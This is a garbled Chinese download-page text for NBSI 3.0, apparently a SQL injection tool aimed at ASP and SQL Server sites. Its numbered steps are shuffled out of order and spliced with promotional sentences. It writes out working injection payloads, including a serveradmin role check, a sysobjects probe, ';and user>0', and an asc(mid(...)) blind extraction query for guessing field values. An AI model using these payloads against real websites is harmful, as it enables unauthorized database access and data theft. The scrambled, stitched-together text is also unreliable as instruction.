10.測試權限結構（mssql）9.(1)猜字段的ascii值（access）6.猜數據庫;and 1=2

;and 1=(SELECT IS_SRVROLEMEMBER('serveRadmin'));--nbsi官方版使用說明1.判斷是否有注入nbsi網站漏洞檢測工具;and (select count(*) from sysobjects)>0 mssql4.注入參數是字符5.搜索時沒過濾參數的nbsi 3.0純凈版簡介本工具功能非常強大，希望同學們用于正途，nbsi網站漏洞檢測工具免費版別去做一些偷雞摸狗的令人可恥的事情，由VB語言編寫的網站漏洞檢測工具的名稱，ASP注入漏洞檢測工具，特別在sql server注入檢測方面有極高的準確率。

8.猜字段中記錄長度'and [查詢條件] and ''='(2)猜字段的ascii值（mssql）7.猜字段nbsi 3.0純凈版是一款專業的網站漏洞檢測工具，使用該軟件用戶可以快速的檢測網站漏洞，檢測結果精準，nbsi網站漏洞檢測工具中文速度快，可以快速的提高該行業人員辦公效率，歡迎來網站下載！;and user>0;and (select top 1 asc(mid(字段名，1，1)) from 數據庫名)>0